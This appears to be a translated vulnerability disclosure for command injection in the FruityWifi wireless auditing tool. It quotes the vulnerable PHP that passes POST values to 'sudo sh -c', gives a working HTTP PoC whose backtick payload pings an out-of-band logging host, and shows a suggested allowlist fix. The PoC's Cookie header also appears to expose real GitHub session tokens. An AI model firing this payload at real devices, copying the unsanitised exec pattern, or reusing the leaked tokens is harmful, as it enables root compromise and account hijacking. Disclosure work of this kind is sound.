
Multiple Command Execution Vulnerabilities in the Wireless Security Auditing Tool FruityWifi

Date: 2018-09-16 19:36:15


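FruityWifi is a well-known open-source wireless security auditing tool inspired by the WiFi Pineapple; it has currently been updated to version 2.4. It lets users control and manage modules through a web interface, which is very convenient. FruityWifi was originally intended to run on the Raspberry Pi, but it can also be installed on Debian-family operating systems such as Debian and Kali Linux, and even on NetHunter for use on some mobile devices. For a detailed introduction and usage guide, see http://www.freebuf.com/articles/wireless/157559.html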

GitHub: https://github.com/PatatasFritas/PatataWifi
Issues: https://github.com/PatatasFritas/PatataWifi/issues/1

The file script/config_iface.php:

<?
include_once dirname(__FILE__)."/../config/config.php";
require_once WWWPATH."/includes/login_check.php";
require_once WWWPATH."/includes/filter_getpost.php";
include_once WWWPATH."/includes/functions.php";
// ------------ IN | OUT (START) -------------
if(isset($_POST['io_mode'])){
    $exec = "/bin/sed -i 's/io_mode=.*/io_mode=\\\"".$_POST['io_mode']."\\\";/g' ../config/config.php";
    exec_fruitywifi($exec);
}

The command built here is executed through the exec_fruitywifi function, which is defined in functions.php as follows:

function exec_fruitywifi($exec) {
    $bin_exec = "/usr/bin/sudo";
    exec("$bin_exec sh -c \"$exec\"", $output);
    //exec("$bin_exec sh -c \"$exec\" 2>&1", $output); //DEBUG SHOW ERRORS (causes problems when used to run a service)
    //LOG
    $rs = fopen(LOGPATH."/exec.log", 'a');
    fwrite($rs, date("Y-m-d H:i:s")." - "."$bin_exec sh -c \"$exec\"\n");
    if(is_array($output) and array_key_exists(0, $output)) {
        fwrite($rs, "\t".$output[0]."\n\n");
    } elseif (is_string($output)) {
        fwrite($rs, "\t".$output."\n\n");
    }
    fclose($rs);
    return $output;
}

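As you can see, the POST value is concatenated directly into the command string, which exec then runs through sudo sh -c.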

The PoC is as follows:

POST /script/config_iface.php HTTP/1.1
Host: 192.168.8.150
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: _ga=GA1.2.1305686839.1530540055; _octo=GH1.1.1160558809.1530540055; tz=Asia%2FShanghai; user_session=G3Lilv5ed8uCKk3xwZs5K_qD6izdAtXukNtPndcLr0ShNo8j; __Host-user_session_same_site=G3Lilv5ed8uCKk3xwZs5K_qD6izdAtXukNtPndcLr0ShNo8j; logged_in=yes; dotcom_user=ly55521; has_recent_activity=1; _gh_sess=MWl5N0NXckk5ekF0TTEzQXEwYUZaMVdaOGFDdWVjbitiMTFqNzJXK0piNmpLTlg4OTJRMHVhQUJrVHRVenNlQ09aUnBIaFJyN2JoNmFBZXdJK1ZVMzRqQXRBTjlRZzdSVFcydUIrTWtrMHhnaWUzRjJlQk9yVGpTSkdkcVJncDh3a0tRR0pWVWlMNkw5Q2QxLzY2T3JDbEo2b1FjTm90WHB0MS94bHNJYmNZTHhaYmllNzMySEVDZWxtTUxYNCtKQzlqRjRVWlJvOUJ5cFFKL3RLRGRpak1rdGZva2M5SnVDekt6N1JpSmVpdHVGMy9aMTFJbkk1eDlnUXAvNm5CTTVjS1dqSmlUbHFhTXc4WExyWnZuQTFXcnBpMHA1OEp3VnBGdWlMSWtTWVk9LS1VTDViV1pMeFNMaGxMUE5lWDg5M1FRPT0%3D--ec33e4803fc050592008c1eebd9fb22483774002
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

io_mode=123%26'%600%26ping%203.t00ls.fc7853eedebcc14a39700d54c9b8acca.tu4.org.%26%60'

The ping request is received, confirming that the injected command ran.

Lines 82/84 of page_config.php have the same command execution vulnerability:

$hostapd_ssid=$_POST['newSSID'];
exec_fruitywifi("sed -i 's/hostapd_ssid=.*/hostapd_ssid=\\\"".$_POST['newSSID']."\\\";/g' ./config/config.php");
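
One way to close both injection points shown above, as an added example that is not part of the original article or the FruityWifi code: validate the posted value against an allowlist and rewrite config.php from PHP instead of building a sed command for sudo sh -c. The function names, the `$key="value";` line format, the allowlist patterns and a config.php writable by the web user are all assumptions.

```php
<?php
// Added example, not FruityWifi code. Assumptions: config.php stores settings as
// lines like  $io_mode="1";  and is writable by the web user; the allowlist
// patterns are illustrative guesses, not the project's real value ranges.
const CONFIG_RULES = [
    'io_mode'      => '/\A[0-9]{1,2}\z/',
    'hostapd_ssid' => '/\A[A-Za-z0-9 _.\-]{1,32}\z/',
];

function render_config_line(string $key, string $value): string
{
    if (!isset(CONFIG_RULES[$key]) || preg_match(CONFIG_RULES[$key], $value) !== 1) {
        throw new InvalidArgumentException("rejected value for $key");
    }
    // var_export() emits a correctly escaped PHP string literal, so the value
    // cannot close the string and add code to config.php.
    return '$' . $key . '=' . var_export($value, true) . ';';
}

function set_config_value(string $path, string $key, string $value): void
{
    $line = render_config_line($key, $value); // validate before touching the file
    $src = file_get_contents($path);
    if ($src === false) {
        throw new RuntimeException("cannot read $path");
    }
    // A callback replacement is inserted verbatim: no sed or regex replacement
    // metacharacters are interpreted, and no shell is involved at any point.
    $pattern = '/^\$' . preg_quote($key, '/') . '=.*$/m';
    $out = preg_replace_callback($pattern, function () use ($line) { return $line; }, $src, -1, $count);
    if ($out === null || $count !== 1) {
        throw new RuntimeException("expected exactly one $key line, found $count");
    }
    if (file_put_contents($path, $out, LOCK_EX) === false) {
        throw new RuntimeException("cannot write $path");
    }
}

// Demo on a constructed config file.
$tmp = tempnam(sys_get_temp_dir(), 'cfg');
file_put_contents($tmp, "<?php\n\$io_mode=\"1\";\n\$hostapd_ssid=\"lab\";\n");
set_config_value($tmp, 'hostapd_ssid', 'Audit-AP 2');
try {
    set_config_value($tmp, 'io_mode', '1`true`'); // shell metacharacters
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
echo file_get_contents($tmp);
unlink($tmp);
```

Escaping the value with escapeshellarg() alone would not be enough in the original code path, because exec_fruitywifi wraps the whole command in a double-quoted sh -c string, where backticks and $ are still expanded.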


Original article: http://blog.51cto.com/010bjsoft/2175710
